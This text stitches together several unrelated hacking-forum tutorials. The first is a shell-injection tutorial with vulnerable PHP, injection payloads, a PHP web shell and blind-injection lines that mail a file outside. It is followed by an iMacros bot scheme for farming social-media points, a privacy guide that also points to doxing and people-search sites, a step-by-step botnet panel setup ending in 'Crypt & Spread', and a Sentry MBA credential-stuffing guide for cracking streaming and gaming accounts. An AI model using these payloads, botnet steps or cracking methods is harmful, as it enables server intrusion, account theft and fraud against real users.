Shell injection & Command injection tutorial

Shell injection & Command injection tutorial


Shell Injection & Command Injection

Shell injection, also known as command injection (the terms are used interchangeably here), while not the most frequently talked about or discovered vulnerability, is nonetheless one of the most critical. This article aims to be the most in depth shell injection article and tutorial on the web. For corrections or enhancements to the content, please contact us.

Article Contents:

Shell Injection Overview & Description (A Basic Introduction)
How to Perform Shell and Command Injection Attacks
How to Test a Website for Command Injection Vulnerabilities
Using Shell Injection as an Attack Vector to Escalate Privileges
How to Automate Tests for Command Injection
Likely Places to Find Shell Injection Vulnerabilities
How to Prevent Shell Injection
Automatically Find Shell Injection on Your Webserver

Shell Injection Overview & Description (A Basic Introduction)

Oftentimes, web applications need to take advantage of underlying programs or applications to complete some functionality. This may be as simple as sending an email using the Unix sendmail program, or as complicated as running custom perl and c++ programs. From a development point of view, this is an excellent way to reduce the development time of an application. However, if data is passed to these programs via a user interface, then an attacker may be able to inject shell commands into these backend programs, potentially leading to compromise.

To understand how the most basic shell injection might work, imagine a simple case. A custom script is needed to display file contents to users, but the development team doesn't want to spend time writing a procedure to read the files. Instead, they decide to allow users to specify a file, then use the Unix command cat to display the results. The code to accomplish this might be something like this in PHP:

PHP Code:

<?php
echo shell_exec('cat '.$_GET['filename']);
?>

So far, so good. Now the script can be called with various GET parameters to output different files to the user. If we add new files to the directory, the application automatically knows how to read and output them, no matter the output. We can see this with a simple example to understand how the program should work. Assume we have a file in the same directory which a user may want to output. Let's call it my_great_content.txt. It contains some test text like the following:

This is my content. It should be visible. Unfortunately, it leads to command injection...

A user comes to the page with the following url:

Code:

www.mysite.com/viewcontent.php?filename=my_great_content.txt

The PHP page shows them the content just as the user expected. For your average user, the page works as expected, and the development team only had to write one line of code.

Unfortunately, as you may have guessed, the code is not secure and is vulnerable to a shell command injection attack. If an attacker comes, they may append a semicolon (;) and another Unix command to the filename specified in the URL parameter. Perhaps they want to start by listing what files are in the directory:

Code:

www.mysite.com/viewcontent.php?filename=my_great_content.txt;ls

The page still comes up with the file contents, but since I injected a command (ls), it doesn't end there. The command line continues to execute the following command and shows some special information:

Code:

This is my content. It should be visible. Unfortunately, it leads to command injection...
my_great_content.txt
viewcontent.php

This example code actually offers numerous opportunities for an attacker, including directory traversals. As a quick example, providing a file name like ../../etc/passwd, would have the cat command print out the list of users on the server. Even if shell injection were prevented by limiting input to the cat function, this issue would still need to be addressed.
How to Perform Shell and Command Injection Attacks

In the previous section, we saw a basic example of how command injection might work. In this section, we will talk about the varieties of command injections and how they can be executed. Assuming some analysis has found a website function which is likely to be vulnerable to shell injection (see the section on testing for command injection) there are a variety of ways to inject shell commands.

Assume for a moment that you have found the previous examples page, which takes as an argument a filename as input and executes the shell command "cat" against that file. In the previous example, a semicolon was used to separate out one command form another, to indicate that after the cat command completed, another function should be called in the same line. It is reasonable to assume that a more advanced developer might have filtered out some forms of shell injection, such as by removing semicolons, rendering the previous attack ineffective. There are a number of ways to string shell commands together to create new commands. Here are the common operators you can use, as well as examples of how they might be used in an attack:

Redirection Operators
Examples: <, >>, >

These operators redirect either input or output somewhere else on the server. < will make whatever comes after it standard input. Replacing the filename with < filename will not change the output, but could be used to avoid some filters. > redirects command output, and can be used to modify files on the server, or create new ones altogether. Combined with the cat command, it could easily be used to add unix users to the system, or deface the website. Finally, >> appends text to a file and is not much different from the original output modifier, but again can be used to avoid some simplistic detection schemes.

Pipes
Examples: |

Pipes allow the user to chain multiple commands. It will redirect the output of one command into the next. So you can run unlimited commands by chaining them with multiple pipes, such as cat file1 | grep "string".

Inline commands
Examples: ;, $

This is the original example. Putting a semicolon asks the command line to execute everything before the semicolon, then execute everything else as if on a fresh command line.

Logical Operators
Examples: $, &&, ||

These operators perform some logical operation against the data before and after them on the command line.

Common Injection Patterns & Results
Here are the expected results from a number of common injection patterns (appending the below to a given input string, assuming all quotes are correctly paired:

Code:

`shell_command` - executes the command
$(shell_command) - executes the command
| shell_command - executes the command and returns the output of the command
|| shell_command - executes the command and returns the output of the command
; shell_command - executes the command and returns the output of the command
&& shell_command executes the command and returns the output of the command
> target_file - overwrites the target file with the output of the previous command
>> target_file - appends the target file with the output of the previous command
< target_file - send contents of target_file to the previous command
- operator - Add additional operations to target command

These examples are only scratching the surface of possible command injection vectors. The full breadth of attack possibilities is dependent upon the underlying function calls. For instance, if an underlying function is using a shell program such as awk, many more attack possibilities arise than laid out here.

Finally, command injection can be more subtle than finding applications which directly call underlying operating system functions. If it is possible to inject code, say PHP code, then you can also perform command injections. Assume you find an application with a PUT vulnerability on a site which is PHP enabled. An attacker could simply upload a PHP file with a single line to have full access to a shell:

PHP Code:

<?php
echo shell_exec('cat '.$_GET['command']);
?>

Thus, it should be noted that many types of attacks, including SQL Injection, have shell injection as an end primary goal to gaining control of the server.
How to Test a Website for Command Injection Vulnerabilities

The first step in identifying command injection vulnerabilities is to map the application. Once you have a series of pages identified to test for command injection, or where you suspect that a website may be calling an underlying operating system function, there are a few simple tests you can perform to get a feel for whether a command injection vulnerability might exist.

Depending on the underlying operating system, the commands will differ. For both Unix and Windows, appending a semicolon to some input data followed by a basic command:

Code:

(Windows) <normal_input>; dir c:
(Unix)    <normal_input>; ls

If the application outputs error messages other than invalid character messages, then a shell injection is likely to be present. There are a few error messages which are the most likely. if you get error messages about the input not being formatted correctly for the command, such as file not found errors when specifying a file to read, then you may have to modify the command accordingly, with quotes for example. Consider again the first example where the application calls the system command cat to read a file, and possible ways you might need to craft an injection string:

PHP Code:

<?php
//sending the input directly. Attack with a string like file.txt;ls
echo shell_exec('cat '.$_GET['command']);
?>

PHP Code:

<?php
//input is placed in quotes.  You must end the quotes to execute an injection. 
//Craft an attack with a string like file.txt";ls
echo shell_exec('cat "'.$_GET['command']).'"';
?>

Testing for Blind Command Injection

Sometimes, an application will not return any error messages back to the screen. In this case, the command injection tests need to be crafted so that they do not depend on output back to the screen. Common commands to use include the unix mail command, or pinging an IP address to see if it is received. You can also try to write test files into the web directory and check if they have been created, though this is less reliable. Some simple examples of blind command injections on Unix, again assuming the application is expecting a text file as user input:

Code:

file.txt;mail tester@test.com < file.txt    //send an email to yourself
file.txt;ping www.test.com        //ping a webserver you have control of
file.txt;echo "test" > test.txt        //write the word "test" to test.txt. try opening this file with the browser.

In each case, consider if some of the input entered is blacklisted by the application. If the basic command injection tests don't return any results, then try encoding common characters. Common encoding schemes include JavaScript uuencode, html encoding within the browser, or various unicode encodings.
Using Shell Injection as an Attack Vector to Escalate Privileges

Shell injection is generally considered one of the most dangerous vulnerabilities because it can be used to gain complete control over a target server. Although server and OS hardening can help to limit the impact and make it harder for an attacker to escalate privileges, there is still significant risk. Privilege escalation usually takes the following path:

Find Shell injection vulnerability. Leverage the vulnerability to gain further shell access by creating a custom shell script accessible to the attacker. This can take many forms, most simply a new, dedicated PHP page which acts as a shell. By default, this shell will have the same access as the user running the web server, usually Apache or IIS.

Once shell access is established, the attacker can monitor processes for additional attack landscapes. A good target might be a database user connection, which allows SQL injection attacks directly against the database, and may allow the attacker to gain control of the database user as well, using SQL Injection to create setuid files owned by the database owner with global read privileges.

From this point, it is a matter of an attacker finding other vulnerabilities on the server and exploiting them to gain additional privileges. Whether this is finding unprotected setuid to root or exploiting known software bugs, it is only a matter of time before the attacker has complete control of the system.

How to Automate Tests for Command Injection

Shell injection testing is part of many automated testing suites, including the Golem security scanner. Existing automated scanners try a variety of shell injection attacks which do no harm to the underlying system, searching for problematic error messages or interesting application behavior.

In order to automate this kind of testing without using an existing tool, the following methodology should be used:

Crawl the application. Gather a list of all pages and the various ways data may be input to the application. For each data input point, attempt basic shell injection attacks such as appending ;ls to normal input. Examine the server response when normal data is entered as compared to when injected data is entered. If the application returns error messages or different responses, it may have a shell injection vulnerability. Iterate steps 2-4 with various injection values, commands, and encoding schemes.

Implementing your own shell injection command automated scanner is not recommended. It is more valuable to leverage existing open source technologies and looking for ways to improve their checking ability rather than starting from scratch. More information on automated security testing and automated scanners can be found in the automated website security testing article. Likely Places to Find Shell Injection Vulnerabilities

The most common places to find shell injection vulnerabilities is during loading of files and in the running of non-native web code such as perl. When a web application can be shown to read files from the disk, it may not be using the proper libraries, and relying on simpler OS commands to retrieve output. File loading applications are great places to check for shell injection. The other most common place is when the application uses a non web language such as perl to complete some functionality. If perl scripts are found to be used, there are many attacks which can be leveraged to inject additional commands as the perl file is being called.

Perhaps the most common location of all is indirect shell injection attacks when the application evaluates code directly, such as the PHP function eval. If the user has any control over data being placed into an eval or similar statement, then this can be used as a vector to execute shell code, since PHP has the capabilities to call system functions. Thus, a common analysis of web applications includes understanding how they are likely to be written as well as the data entry points where an attack could be attempted.
How to Prevent Shell Injection

Despite the myriad ways described above to attempt shell injection, it can be prevented with a few simple steps. Top among these is to carefully sanitize all user input data. If you can avoid passing user given arguments to OS programs, you should seriously consider doing so. Alternately, be sure to strip out potentially damaging characters such as semicolons, or other separators which can be used to run additional commands. In Unix, this includes pipes (|), and ampersand (&). The best way to accomplish this is with a whitelist. For the filename examples given above, maintain a list of acceptable files and check that the input matches an entry in this list exactly. Everything else needs to be discarded as an unsafe operation.

If a white list is not possible, create as strict as possible input filters. generally good ones will strip out all dangerous characters listed in how to perform command injection above, as well as limit the length of input and check for valid input data types (such as verifying that the input is a number. It may also be smart to include filtering functions in addition to this filtering. PHP has escapeshellarg and escapeshellcmd functions for this purpose. However, they are not 100% secure and should only be one component of an overall filtering strategy.

Alternately, you could wrap OS commands in more secure languages, such as Java. If you run the Java exec command, it passes each command given it as a separate argument, eliminating some of the most common injection vectors.

Essentially, shell injection vectors, like other injection attacks, are hard to prevent since legitimate input may be very similar to attacker input. The key is carefully sanitizing data, white-listing data, and preventing shell commands from being passed through from user input wherever possible.

Get thousands of Fb/Twitter/MANYMORE followers hourly!


What is AddMeFast?
http://addmefast.com/

AddMeFast is a network that will help you grow your social presence. We allow you to look and choose who you want to like/subscribe/follow/view and skip those who you are not interested in.

This means that you can get the following:
Facebook Post/Photo Likes; Subscribers; Shares
Twitter Followers/Tweets/Re-tweets/Favorite
YouTube Views/Channel Subscribe/Video likes
Pinterest Followers
Google Circles
SoundCloud
Instagram Followers
Vkontakte
Website hits
...and many many more!

Explanation:

Q:So how do I use AddMeFast to get all the popularity?

A:Since AddMeFast is a social exchange site, whereby you follow/like others to earn points, and to get followers/likes, you offer points. Hence, points are essential for huge amount of followers/likes. This tutorial will teach you how to get THOUSANDS of points into your account DAILY without doing anything!


What will you need:
All you need is 5 minutes!
1)Firefox
2)Firefox iMacros Plugin
3)An AddMeFast Account
4)iMacros scripts Version 3.1 [24 March 2016]
Download http://ge.tt/8cSDXai2

Setting up:
3 simple steps and you're done! ;)


1)After you're done with getting Firefox and iMacros plugin, go to C:\Users\YOUR_USERNAME\Documents\iMacros\Macros and extract the 'AddMeFast' folder in AddMeFast.zip there.
Screenshot - ZIP password: This is made by Reinheart on HackForums. I promise not to distribute his scripts anywhere else.

2)Open your Firefox and open iMacros, you should see 10 scripts on the left iMacros pannel. You're almost done setting up ;)
Screenshot

3)Simply create a junk Facebook/Youtube/Twitter account, and ensure that you're logged in whenever you visit the Facebook/Youtube, then select any of the script you prefer, and set loop from 1 to 9999 and click 'Play (loop)', wait for 3 minutes and if points are increasing, you're doing it right

Tips to maximize points earnings:


1)Always make a new trash YouTube/Facebook account once in awhile (every month for me), this way you will be able to avoid liking those things that you already liked.
2)Open multiple windows of Firefox, each running a different script.
3)Whenever the script is being ran, take 10 minutes to ensure that you're earning points before you leave it to autopilot.
4)Collect Daily Bonus of 150 Points by completing 20 offers. Bonus page!
5) NEW! For websites such as Facebook that requires you to verify your email for your newly created junk account which you will make once every 3 days(Stated in point 1), you can easily make a junk e-mail at HERE, it takes less than 1 minute for each account.

How to protect your identity online


CREDITS: Developer from hackforums



I will not guarantee 100% assurance that if you follow my tips, you will be entirely untraceable, but your percentage will increase dramatically.

The information I will provide might make you paranoid by the time you are done reading this, so if you don't want to be informed and paranoid, please don't read this.

I will be covering:

1) History - Hackers
2) Website owners
3) Your name
4) Your e-mail
5) What you sign up to
6) Information you expose unknowingly
7) Keeping you safe

You hear it on the news, you read it on the newspaper, you live with it everywhere without even acknowledging its existence.

"Hackers have stolen identities" I have heard that line so many times this year, it is ridiculous.

Companies promising to "defend" your identity, memberships giving their words to keep your information to themselves only, the government reassuring that they will only have access.

All this is a lie as information ALWAYS gets leaked or there is an inside worker providing information out into the black market.
Not only that, but securities on big companies are always exposed and hackers always find their way in.

1) History - Hackers

I will explain briefly on the type of hackers that there are out there for the sake of academical knowledge. These descriptions are not in dept, instead they are meant to slightly touch the subject and educate those are who are unaware of these titles on the cyber world.

1) Black Hat Hackers - These are the most infamous hackers there are. These are the guys you hear about it on the news due to committing crimes. These people are whose purpose is to gain information and use for their own need. They could be anyone.

-Black Hats tend to be professionals at what they do and are extremely well informed on everything related with the cyber world and crimes.
-Black Hats tend to be educated people who have worked many years to accumulate all the knowledge they hold. They are not your kid who uses "hacking tools" to scare their gaming buddies online.
-Black Hats is the image typically portrayed on movies.

2) White Hat Hackers - These are the lesser known hackers simply because they do the clean up work that goes behind the scenes cleaning up the messes from Black Hat Hackers.

-White Hats are the heroes of the cyber world. They fight crime using their hacking knowledge to patch exploits on system and assure that your information does not gets leaked out or easily acquired by any Black Hats.
-White Hats are professionals at what they do. They have as much knowledge as Black Hats, but use their skills to fight crime rather than aid it.

3) Gray Hat Hackers - These are the somewhat known hackers simply because they are unpredictable on what their actions might turn into. They are known as "Gray Hats" because it's a mixture between the color White + Black = Creating: Gray

-Gray Hats are essentially neutrals on what they do. They might decide to do what's right even if there's some other entity telling them that it's wrong or could be vice versa.

For example, Black Hat steals bank information and leaks out on the internet. Gray Hat could either decide to either use the information OR let the owners, authorities, or the companies know of the exposure.



2) Website owners

Websites, there are millions of them around the world in all languages. You can keep yourself entertained on them or you can become smarter reading potential useful information as you are reading now. Thumbsup

Do you ever wonder "Who owns this website?" or "How can I find out who owns it?"

I decided to include this topic on here since more and more people decide to pay for hosting services to have their very own website for either personal usage or some sort of business.

Well, unlike in the real world where you fill out papers and they get stacked or hidden in some compartment where not a random person could have access. Websites expose your information unknowingly. Maybe not the websites themselves, but the companies that provide hosting services.

I will use this website "HackForums.net" as an example to teach what I'm talking about.

There is something known as a "whois" that essentially tells you who registered the domain name.

You can easily Google "whois domain" and a huge list of websites that allow you to whois either a location or a domain to find its location.

My favorite website to do whois is:

http://whois.domaintools.com/

Now, if we do a whois on HackForums.net, here's what we get.

Quote:
Domain Name: HACKFORUMS.NET
Registrar: MONIKER

Registrant [2341726]:
Moniker Privacy Services
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

Administrative Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US
Phone: +1.9549848445
Fax: +1.9549699155

Billing Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US
Phone: +1.9549848445
Fax: +1.9549699155

Technical Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US
Phone: +1.9549848445
Fax: +1.9549699155

Domain servers in listed order:

NS1.DALLAS-IDC.COM
NS2.DALLAS-IDC.COM
NS1.ZANMO.COM 69.162.82.250

Record created on: 2005-09-27 14:18:41.0
Database last updated on: 2010-11-29 02:16:59.78
Domain Expires on: 2011-09-27 14:18:41.0

As you can see it exposes a lot of information that you wouldn't want strangers to get a hold of you and then use to sell for their own good.

HackForums.net is registered as a "Private" domain, so no real information is shown of the real owner. Instead, it displays the information of the company providing the service for the domain or hosting.

This is also how you can contact a company if you want to report a website with disgusting content such as child pornography.

I'm not going to whois a person's website since it would be against the rules to expose personal information about anyone, but I believe that you get the idea of what can be done to discover information such as address, name, phone number, fax number, and more using nothing but a website name.

Experienced website administrators always should use Private domains to avoid exposing information to the public as much as possible.

If you have a website, whois it yourself and find out whether if you are exposed or not. If you are, call the company you registered your domain and request your domain to be put as private. They might require a fee of around $7 extra a year, but it's worth it knowing that you're not exposed.

You could also find out the ISP or company by doing a ping on an IP.

Example,

Open Command Prompt and type "ping Hackforums.net" the response will be an IP. Once you have that IP, you can use:

http://iplocation.net/

To tell you where the servers are located and giving you a definite location for the company's machines.

http://iplocation.net/ Can also be used to find the location of a person's location with their IP.


3) Your name

Your name is as unique as you can be. Your parents/guardians named you and that's what makes you, you.

Your name can be your worst enemy when you are online as it can be used to expose so much information about you to the point of where you could be blackmailed.

Where should you ever use your real name online? NEVER. Why? Because, using your name alone anyone can find out where you live within a matter of 5 seconds.

Websites such as:

http://com.lullar.com/

http://www.pipl.com/email/

http://www.spokeo.com

http://www.emailfinder.com

http://extremetracking.com/

http://www.411.com/
http://www.ask.com/
http://www.bebo.com/
http://www.facebook.com/
http://www.flickr.com/
http://www.ip-adress.com/ipaddresstolocation/
http://www.myspace.com/
http://www.myyearbook.com/
http://www.searchenginez.com/findpeople.html
http://www.skipease.com/
http://www.sonico.com/
http://www.spock.com/
http://www.twitter.com/
http://www.usatrace.com/
http://www.whitepages.com
http://www.whois.com/
http://www.whois.net/
http://www.wink.com/
http://www.youtube.com
http://www.zabasearch.com/
http://www.zoominfo.com

I highly recommend you read these other threads that I wrote:
The King Of Doxing Tutorial (Very detailed) Part 1/2
The King Of Doxing Tutorial (Very detailed) Part 2/2

Make it extremely easy to search names, e-mails, etc to dig information about whoever you want. There are more websites in which I personally use to dig information about people, but I will not mention them since I do not want the news station going crazy on a new rage of identity exposers. Black Hat

Here's an example of a person I searched for the sake of showing.
[img]http://img130.imageshack.us/img130/332/identity.png[/img]

I have satellite pictures using Google Earth to pinpoint exactly where she lives and what her house looks like, but I will not expose that.

Where is this information normally exposed? Hmm...I'll let you guess. Or maybe not...The answer is Social Networks. Ah, Facebook, Myspace, Orkut, and so many others...The list goes on and on.

I highly recommend that you NEVER use your real name, instead use an edited name or initials instead rather than exposing your real name to the real world. If your friends on social networks already know you, they should not need to see your complete name as they will already know you.

For example,

Bill Gates

My recommendation would be to use "Billy Gates" simply because a letter being off makes it so incredibly difficult to pinpoint someone.

You can use your imagination for what you should replace your name instead of your real name. That is, if you want to avoid being looked up.

Something I have found based on experience is that it's much more difficult pinpointing teenagers on the internet since they are not normally registered with government database that eases finding them.

If you are a teenager, do not have your parents names exposed as the name of your parents can be used to pinpoint you or vice versa, if you are a parent. Ironically, it's the teenagers that expose more information than adults and yet, they are the ones harder to pinpoint.

4) Your e-mail

Your e-mail, the one you use to check on your everyday business or activities online. The one you rely to deliver things to you safely.

Question is, are you delivering to it safely? Probably not, or at least I hope you are.

The e-mail problem is an easy fix since all it takes is common sense.

If you have various accounts such as Social networks, have an e-mail specifically for messing around. If you have accounts for serious business such as your Paypal, Bank, etc...

Have an e-mail that only you have access to and is different from your regular "messing around" e-mail.

If you work for any companies or have services with an ISP, avoid using their e-mail services to register on important websites where your money is dealt with such as Paypal, AlertMoney, banks, etc...

Why? Because they have been known to get hacked leaving all your information exposed for hackers to gorge in. Instead, I would recommend focusing on big companies such as Yahoo, Hotmail, or Gmail since these are much more secured companies and will always be up 24/7 any time of the year.

Not much to say on that, just have different e-mails for different activities for security measures. Not only that, but also have different passwords that require extensive typing with various complicating symbols such as:

you%(3cool

That above is a ridiculous example, but I believe you get the idea.

You know what hackers love the most? Not having to do much work and having everything set for them easily for the taking. For example, if you are infected with a keylogger, a hacker would love to have 1 e-mail to have access to everything. So, this gives you an idea why you should have a variety at all times with up-to-date information to assure that you could retrieve it, in case if it were to get stolen.


5) What you sign up to

Ever wondered why you get so much spam e-mails? Well, it's simple. It's because e-mail collectors acquire a list of e-mails in which they can mass e-mail to send spam.

Just as I mentioned earlier, have an e-mail for messing around and e-mails for serious business. Avoid using an e-mail for all activities as this will only clog your inbox with useless e-mails that will steal your valuable time.

There are many websites which sell their database of e-mails to E-mail spammers for a certain amount of money behind the scenes or the collectors themselves have set traps through the internet such as Phishing to acquire a list of e-mails to spam.

Avoid registering to websites such as products and random useless subjects that promise to pay you money for signing up or trying their products.

Seems to me like it's common sense, but it's good to know.



6) Information you expose unknowingly

Well, I hope that I have given you a good idea of easily information can be acquired using the internet.

Privacy does not exists anymore on the internet.

If you use Social Networks, try to have your information concealed as much as possible from the public and do not expose valuable information such as Birthday, location, or name to keep yourself as underground as possible.

You have to consider that information could be leaked physically or electronically as well.

Keep yourself up-to-date and informed to know if a company you might use has been breached or not.

http://en.wikipedia.org/wiki/Timeline_of...er_history

As they say, Google is your friend. Use it when you need it.

7) Keeping you safe

This is probably the most important part of the tutorial as this is where the most incidents occur due to infections or traps.

Infections or traps can range from:

-RATs (Remote Access Tool) which essentially give completely control of your computer.

-Keylogging which retains a log of all the keys you ever press on your keyboard.

-Phishing which retains a log when you manually input your information on a fake website emulating an original website.

-And more, but those above are the most common.

How can you protect yourself?

Around 90% of malware on the internet was coded to infect Windows Operating systems. I got that number from PC World about a year ago, forgive me if it's incorrect now.

Anyway, assuming that you run on Windows you are the ones are the highest risk of getting targeted or infected.

You will want to always have your computer clean and secured having the proper tools. All these tools are the best of the best and are all free. They are probably better than paid security software.

How do I know this? Well, there are websites where you can scan malware after you crypt them (making them undetectable) to ensure that they are not detected by Anti-virus of any kind. Avira is the one that people always have a hard time bypassing, so I can safely say that it's the best from my personal experience of crypting and scanning.

Download and install all these tools below and I can assure you that your computer will be protected 1000% better than what it might be as of now. Get the free versions.

http://www.malwarebytes.org/

http://personalfirewall.comodo.com/

Avira Anti-Virus - Follow the instructions on that link on how to get it free.

KeyScrambler Pro 2.7 - Follow the instructions on that link on how to get it for free. This software helps to encrypt everything you type on the internet.

If you use Google Chrome, get this:

https://chrome.google.com/extensions/det...ckof?hl=en

It encrypts all your website visits as https:// rather than http:// which makes you more secured.

If you use Firefox, get this:

http://www.eff.org/https-everywhere

It encrypts all your website visits as https:// rather than http:// which makes you more secured as well.

http://notendur.hi.is/~gas15/FireShepherd/

FireShepherd, a small console program that floods the nearby wireless network with packets designed to turn off FireSheep, effectively shutting down nearby FireSheep programs every 0.5 sec or so, making you and the people around you secure from most people using FireSheep.
The program kills the current version of FireSheep running nearby, but the user is still in danger of all other session hijacking mechanisms. Do not do anything over a untrusted network that you cannot share with everyone.
-Know that this is only a temporary solution to the FireSheep problem, created to give people the chance to secure themselves and the others around them from the current threat, while the security vulnerabilities revealed by FireSheep are being fixed.

The other option is using a different operating system which has a lower percentage of being targeted.

You don't have to spend tons of money on Apple computers, instead you can get a free operating system from the Linux distributions.

The easiest to use and most similar to Windows looks is Ubuntu. You can install Ubuntu as a normal program on Windows and once it restarts, it shows you the option to choose Ubuntu over Windows.

You can watch this video:

http://www.youtube.com/watch?v=UdI8_92QTkQ

To learn more in dept. It's very simple, so don't be afraid to try.

The video focuses on completely replacing your current operating system Windows and replacing it or dual booting with Linux Ubuntu.

If you are a noobie, I would recommend you stop at the part where he goes to:

Wubi Installer - Ubuntu

It's as simple as going Next, next, next on any normal installation and whenever you restart your computer, it will ask you to choose either Ubuntu or Windows.

Running under a Linux distribution will put you at around a 2-5% of getting infected with anything. Not only is Linux good, but you don't have to worry much about installing anti-virus or anti-malware software to keep your computer clean and running.

How to Setup a Botnet [ Free Website+Hosting ]

How to Setup a Botnet [ Free Website+Hosting ]

How To Setup a HTTP Botnet + Getting a Website and Hosting.

Hello and welcome to my First tutorial.
I will teach you step by step about how to setup a Botnet.

Some things you need to know:
A Botnet is a Panel that can keep many Computers connected to it.
The Computers connected to it is called Bots.
The bots will be under your Command so you will be able to command them to do things and they will do it.
In this tutorial I will teach you how to setup a Botnet.

Alright lets start.

If you already got a Website + Hosting Dont click on this Spoiler, if you dont click :)

PS. Website name cannot be longer than 12 Characters.

This is how to create a free Website and get Free Hosting.

First go to Dot.Tk and Register

After you login go to Domain Panel and then add a Domain Name

Now open a new browser and go to DerpyMail ( Free Hosting )
Add the free hosting to you cart and register then checkout!
Go back to Dot.TK and go to the Domain Panel and Click Modify
Change the Name Servers ( DNS/NS ) to 
Code:
ns1.derpymail.us
ns2.derpymail.us
Then wait for the Email with your new account information and continue to the next Part!

Before doing anything Download the Botnet File's.
To download the Botnet just google it

Step: 1

Extract the Botnet Files and then open up the Folder "Panel".
Find Config.Php and Edit it with any writing Program.

Step: 2

Now go to your Webhost and add SQL DB and User.
When you are done with that upload the .sql to your sql DB from the Folder "SQL".

Step: 3

Edit the SQL Connection info in Config.Php.
Save when done.

Step: 3

Upload everything in the Folder "Panel" to your Webhost.
Now close the folder etc.

Step: 4

Go to the Website you used to upload.
Login to your Botnet with the password in Config.Php
Congratulations!
You got your own Botnet!

Step: 5
Go back to the Folder "Botnet" and open up Build.exe.
Then type in Your Domain Name and the Path.
Build the File, Crypt & Spread!

This Tutorial is for Learning purpose only and should not be used in Illegal ways.
I am not responsible about what you do with this, but it should be used private only with permission from the computer owners.

I do not own or have coded the botnet.




Learn How To Crack Using Sentry MBA Netflix - Spotify - Steam - Etc

Learn How To Crack Using Sentry MBA Netflix - Spotify - Steam - Etc

There's a few of these tutorials but I thought it would be great with a new one.
Follow this guide and you'll be able to crack accounts in no time. :)

If you have any questions, PM me!

Download Links:
Sentry MBA:
https://www.sentry.mba/
Some Configs:
https://anonfiles.com/file/3bca196ab478c...3541349688
Proxies:
http://orcahub.com/proxy-list/
Combo Lists: Just Google it for a list.

Step 1 - Introduction - What is Sentry MBA?
Sentry MBA is basically a universal cracking program/tool which allows you to crack tons of accounts like Netflix, Spotify and a lots more.
It's the #1 most used program/tool when it comes to cracking accounts.
And trust me, it's easy!

Step 2 - What kind of accounts can you crack using this?:
Netflix
Spotify
Steam
Origin
Minecraft
Gamestop
Instagram
Snapchat
Adult Accounts
And tons of more, yes that's correct, tons of more accounts.

There's literally 100's of different accounts you could crack with SentryMBA.
Step 3 - What will we need be able to crack some accounts?
Sentry MBA
Configs
Combolist
Proxies

Step 3 - What will we need be able to crack some accounts?
Sentry MBA
Configs
Combolist
Proxies
Step 4 - What exactly is Combolist - Proxies - Configs?

Combolist Explanation:
It's a list of combos with usernames/emails and passwords. For an example.
When you log in to Facebook you use your Email and password to access your account.
Email/Username:Password

EmailHere@hotmail.com:PasswordHere
- OR -
UsernameHere:PasswordHere

Proxy explanation:
A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services, It's like a middleman.
For an example, look at this picture in the spoiler.
It should give you a pretty good explanation on what a proxy sever is.

Step 5 - Set it up and start cracking!

1. Open Sentry MBA:
First, what you wanna do is to open up Sentry MBA and it should look like something like this:
(Download links at the top)


2. Import Configs:
Once you have opened it, click on the tab "General". For an example I'll use Netflix configs right now,
Just Google it and grab that configs
Once you're in the "General" tab click the button "Load settings from snapshot" and open the config (Should be an .ini file)


3. Import Proxylist:
Now what we will do is to add a proxylist. Can also be found on the top of this thread.
Click the "Lists" tab in Sentry and then "Proxylist" and you should see something like this:


Now click the map folder to the right named "Load Options" and import the proxylist text file here:


4. Import Combolist:
Now we're gonna import the combolist. And to do so you'll have to click the tab named "Wordlist" which is exactly under the "Proxylist" tab.
And now you should see something like this:


Now you're gonna click the "Open A Combo List" folder right here and import the combolist
(There's also download links on combolists at the top of this thread):


5. Start Cracking:
Now we have it all setup. Proxylist, Netflix configs, Combolist. Let's start cracking shall we?
The only thing you've got to do now is to click the "Start" button in the left corner and it should start the cracking session!